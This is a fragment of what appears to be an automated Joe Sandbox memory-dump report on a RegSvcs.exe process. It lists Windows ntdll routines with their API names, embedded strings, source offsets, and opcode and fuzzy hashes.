                                                                  control_flow_graph 52 19b4a80-19b4a8b 53 19b4a9f-19b4aa6 52->53 54 19b4a8d-19b4a99 RtlDebugPrintTimes 52->54 55 19b4aa8-19b4aae 53->55 56 19b4aaf-19b4ab6 call 199f5a0 53->56 54->53 59 19b4b25-19b4b26 54->59 61 19b4ab8-19b4b22 call 19a1e46 * 2 56->61 62 19b4b23 56->62 61->62 62->59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0I9w$0I9w$0I9w$0I9w$0I9w$0I9w
                                                                  • API String ID: 3446177414-1295150601
                                                                  • Opcode ID: c95b6122c9bdec2b1ae62eea3e226c759b7f1d160f9c87c97b2464cec07daa78
                                                                  • Instruction ID: f65fb148e459caa73d8a8c6600f29fd84504947445069cfa090306e901d01e91
                                                                  • Opcode Fuzzy Hash: c95b6122c9bdec2b1ae62eea3e226c759b7f1d160f9c87c97b2464cec07daa78
                                                                  • Instruction Fuzzy Hash: 5101B136E053109FDB709E287A487C73AD5B789738F26005AEA0D8B2A9D7704C42E795

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph: entry block 19b2890-19b28b3, calls 19c0050 (rendered graph edge list omitted)
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID:
                                                                  • API String ID: 48624451-0
                                                                  • Opcode ID: 7ef88d8d6328fc688e4a770af82d33ab95da7d84fa7524523eb96adf0baf012a
                                                                  • Instruction ID: a9bac4bc08cc7551c0ecca4c0a9a6ebfe81ad3a0913de66d1efb24fdce823949
                                                                  • Opcode Fuzzy Hash: 7ef88d8d6328fc688e4a770af82d33ab95da7d84fa7524523eb96adf0baf012a
                                                                  • Instruction Fuzzy Hash: 1351D4B5A00116BBDB21DB9CCAD09BEFBB8FB48641B148529E4ADD7641D734EE0087E1

                                                                  Control-flow Graph

                                                                  Strings
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D79D5
                                                                  • SsHd, xrefs: 0198A3E4
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 019D79D0, 019D79F5
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D79FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                  • API String ID: 0-929470617
                                                                  • Opcode ID: 0be1bc702e24db0184e9a51cd78684baf1ed9a28004ead6ec230a1a2899e0401
                                                                  • Instruction ID: 755d2c5a07552c27e25b1f11d8804f55152d74ed2810fe12005c8f40a663a998
                                                                  • Opcode Fuzzy Hash: 0be1bc702e24db0184e9a51cd78684baf1ed9a28004ead6ec230a1a2899e0401
                                                                  • Instruction Fuzzy Hash: C8E1D6716043028FDB29DE6CC884B2ABBE5BB84319F144A2FF95ECB291D731D985C752

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D9346
                                                                  • GsHd, xrefs: 0198D874
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 019D9341, 019D9366
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D936B
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                  • API String ID: 3446177414-576511823
                                                                  • Opcode ID: da02e501921c321281ae01fb986edcdde7df18a427a6e40b17dd95f152317dac
                                                                  • Instruction ID: 4dfe0588e5818e614a18faf946c9fb36c6ed2eb34722f164d4c96809f62d3751
                                                                  • Opcode Fuzzy Hash: da02e501921c321281ae01fb986edcdde7df18a427a6e40b17dd95f152317dac
                                                                  • Instruction Fuzzy Hash: A9E1C7716043428FDB24EF98C480B6ABBE9BF89718F04892DE99DDB2C1D771D944CB52
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                  • Instruction ID: 700c65215880cbaf4961815436c19e070f2e83388135442424ba0706eebbe889
                                                                  • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                  • Instruction Fuzzy Hash: DE81F370E012499EEF25CE6CCAD0BFEBBB5AF45321F18451AD85BA76C1C7308840CB51
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$@
                                                                  • API String ID: 3446177414-1194432280
                                                                  • Opcode ID: c44d939f61d4b9f5ea84f0d0acd817aebd8f04553135fbb129eb7ed9dd5e92ac
                                                                  • Instruction ID: 75535cb34ecba7f4dc80e0259bd9ec57fe6e982ca89cffd667b6d93ba90f6da6
                                                                  • Opcode Fuzzy Hash: c44d939f61d4b9f5ea84f0d0acd817aebd8f04553135fbb129eb7ed9dd5e92ac
                                                                  • Instruction Fuzzy Hash: 6E810A75D002699BDB35DB54CC45BEAB6B8BF48714F0041EAEA1DB7250E7309E85CFA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0I9w$0I9w$0I9w$X
                                                                  • API String ID: 3446177414-880155641
                                                                  • Opcode ID: e3f3a9b838956a18c40489a211027f1be274ed0baca2eb9b8525691896f00059
                                                                  • Instruction ID: 72916bdad407e25f2be2eab3b86f2164c150b64145a489b7cfdbc4d57cf614cf
                                                                  • Opcode Fuzzy Hash: e3f3a9b838956a18c40489a211027f1be274ed0baca2eb9b8525691896f00059
                                                                  • Instruction Fuzzy Hash: EA318D3590420AEFCF22DF58DA80BCE7BA9AB88759F01401DFD199B252D2709A51EF85
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                  • API String ID: 3446177414-56086060
                                                                  • Opcode ID: 378a382eb29715f653c0b11311390cf5c0a355563995ad8c9aacd888c1e2ecae
                                                                  • Instruction ID: 36abeb25a6f13b39c1b1006ee440094d2e96fd75d108ab83c77046be001c6b99
                                                                  • Opcode Fuzzy Hash: 378a382eb29715f653c0b11311390cf5c0a355563995ad8c9aacd888c1e2ecae
                                                                  • Instruction Fuzzy Hash: 10415631600749DFDB22DFACC586B6ABBF8EF40725F108569E50E87A91C778A981C790
                                                                  APIs
                                                                  Strings
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 019F4899
                                                                  • LdrpCheckRedirection, xrefs: 019F488F
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019F4888
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 3446177414-3154609507
                                                                  • Opcode ID: fbebadfa3e8e71cde4c8b1224297eab98e11ff0f40974b41af7ee993c9e516fd
                                                                  • Instruction ID: 967dd8914ace841bb444970f4d176d1723bcbc2235193c152219c1ad3fcb4267
                                                                  • Opcode Fuzzy Hash: fbebadfa3e8e71cde4c8b1224297eab98e11ff0f40974b41af7ee993c9e516fd
                                                                  • Instruction Fuzzy Hash: 4941AE32A04651AFCB21CE69D840E27BBE8AF89A51F15066DEE4C97325D730E800CBD2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                  • API String ID: 3446177414-3526935505
                                                                  • Opcode ID: 2fa81c209fe433e45a127ed10bf0c14a83cae82260a6ee96cc77740c0727e1d6
                                                                  • Instruction ID: f84a84f87ce40c7500891e2ab48ac55ae72f8fafcbc82488d0f022f9d2adb660
                                                                  • Opcode Fuzzy Hash: 2fa81c209fe433e45a127ed10bf0c14a83cae82260a6ee96cc77740c0727e1d6
                                                                  • Instruction Fuzzy Hash: B53156312047C4DFEB26DB6CC84AFA67BE8EF41B14F058459E40F87652D7B8A881C761
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $
                                                                  • API String ID: 3446177414-3993045852
                                                                  • Opcode ID: deba2d7d5ce68dbf925d29a5b7f1f2f912fe8489e9a39431e69ae9a1260c3ce8
                                                                  • Instruction ID: cd86c711e835f2eaed8a98ce7765a0254273182b61377edfb2a102344d97dea0
                                                                  • Opcode Fuzzy Hash: deba2d7d5ce68dbf925d29a5b7f1f2f912fe8489e9a39431e69ae9a1260c3ce8
                                                                  • Instruction Fuzzy Hash: 96116136904219EFCF15AFA4E948ADD7B71FF85761F108529F86A672E0CB319A01CF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f075250305e27529f45c82400f6c3b3da2d154e25e441f01435462d0025fbd00
                                                                  • Instruction ID: bf7d2cbd85285b432a38e60870737941eb4c53383fdd5d1f1898c3842b3b4e33
                                                                  • Opcode Fuzzy Hash: f075250305e27529f45c82400f6c3b3da2d154e25e441f01435462d0025fbd00
                                                                  • Instruction Fuzzy Hash: 5DE1DCB4900608DFCF26CFADC984A9DFBF9BF48315F24496AE54AA7261D770A841CF50
APIs
Memory Dump Source
• Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 995faa4ede7c5fed5097b51be711721ab8d39cfda4429caa82b07af2b598992c
• Instruction ID: d8e451448683e406cddd699ed4f54f62a1b50bbe418c0f07cc34c8a241cdbfb9
• Opcode Fuzzy Hash: 995faa4ede7c5fed5097b51be711721ab8d39cfda4429caa82b07af2b598992c
• Instruction Fuzzy Hash: 86712671E0021D9FDF06CFA8C988ADDBBF5BF49354F14402AE909EB254D734A945CB64
APIs
Memory Dump Source
• Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 7e88b66fc877775682b8c07eb9a64ff08bb111450c99592a6a7d616f85ac5eb7
• Instruction ID: 99147d8ffe717827e9e14edd8611845097242ef92f16ab2e2f74c9b186eee1fb
• Opcode Fuzzy Hash: 7e88b66fc877775682b8c07eb9a64ff08bb111450c99592a6a7d616f85ac5eb7
• Instruction Fuzzy Hash: 55513476E00219EFEF0ACF98D848ADDBBF5BF88355F14812AE909A7250D734A941CF54
APIs
Memory Dump Source
• Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes$BaseInitThreadThunk
• String ID:
• API String ID: 4281723722-0
• Opcode ID: b61e777c2ac89e2e7a48fb71a9a5c2d4718dde05b33293e7909e45d0014dbc30
• Instruction ID: 969e8e5c50cc15f17ed33411f5279e06601a2ea59dbf2aefa6bc33c47ad0b335
• Opcode Fuzzy Hash: b61e777c2ac89e2e7a48fb71a9a5c2d4718dde05b33293e7909e45d0014dbc30
• Instruction Fuzzy Hash: 54310675E00219EFCF25DFA8D849A9EBBF1BB48720F10412AE519F7294DB355901CF54
Strings
Memory Dump Source
• Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: a7acc20d8ebd350f5e6922d2326cd49b5334a41e98f17d53b8af1867c86e2d16
• Instruction ID: b0a9a036122082d75e9324b0cb7eb5385a07d579eef4ff86d8ddf165b140ebd5
• Opcode Fuzzy Hash: a7acc20d8ebd350f5e6922d2326cd49b5334a41e98f17d53b8af1867c86e2d16
• Instruction Fuzzy Hash: 80325670D0426ADFEB61DF68C884BE9BBB4BF48304F0485E9D54DA7241D774AA84CF91
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
• Instruction ID: 05d92f948f515153ca9c073e16b7125e19b4a737b37c554af87163f2da5e3de7
• Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
• Instruction Fuzzy Hash: 4191A571E002069ADB28DFADCAC0AFEBBA9AFC4761F14471AE95DE72D0D73099408715
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
